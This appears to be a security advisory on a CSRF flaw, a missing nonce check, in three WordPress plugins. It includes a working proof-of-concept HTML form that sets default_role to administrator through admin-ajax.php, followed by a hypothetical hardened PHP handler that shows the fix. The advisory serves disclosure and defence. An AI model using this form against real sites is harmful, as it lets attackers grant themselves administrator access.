The Login/Signup Popup, Side Cart WooCommerce, and Waitlist WooCommerce plugins are all vulnerable to cross-site request forgery (CSRF). A nonce check is missing, which makes it possible for attackers to update arbitrary options on a vulnerable WordPress site.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="form" value="default_role=administrator" />
<input type="hidden" name="action" value="xoo_admin_settings_save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
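
A handler for the `xoo_admin_settings_save` action that would reject the request above, as an added example and not the plugins' own code: it verifies a nonce, checks the caller's capability, and writes only allowlisted options. The nonce action `xoo_settings_nonce`, the `security` field, the `xoo_example_*` function names and option keys, and the assumption that `form` is parsed as a query string are all hypothetical.

```php
<?php
// Added example: hypothetical hardened handler, not the plugins' actual code.
// Assumed names: 'xoo_settings_nonce' (nonce action), 'security' (nonce field),
// xoo_example_allowed_options() and the option keys it returns.

add_action( 'wp_ajax_xoo_admin_settings_save', 'xoo_example_settings_save' );

// Only options the plugin itself owns may be written (hypothetical keys).
function xoo_example_allowed_options() {
    return array( 'xoo_example_popup_style', 'xoo_example_redirect_url' );
}

function xoo_example_settings_save() {
    // 1. CSRF: reject requests that lack a valid nonce in the 'security' field.
    //    With the third argument false, check_ajax_referer() returns false
    //    instead of terminating, so the handler can send its own response.
    if ( ! check_ajax_referer( 'xoo_settings_nonce', 'security', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // 2. Authorization: a nonce is not a permission check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Parse the "form" field (assumed to be a query string, as in the form above).
    $raw    = isset( $_POST['form'] ) ? wp_unslash( $_POST['form'] ) : '';
    $fields = array();
    parse_str( $raw, $fields );

    // 4. Allowlist: core options such as default_role are never in the list,
    //    so they cannot be written through this endpoint.
    $saved = array();
    foreach ( xoo_example_allowed_options() as $key ) {
        if ( isset( $fields[ $key ] ) && is_string( $fields[ $key ] ) ) {
            update_option( $key, sanitize_text_field( $fields[ $key ] ) );
            $saved[] = $key;
        }
    }

    wp_send_json_success( array( 'saved' => $saved ) );
}

// The settings page must emit the matching nonce inside its form, for example:
// wp_nonce_field( 'xoo_settings_nonce', 'security' );
```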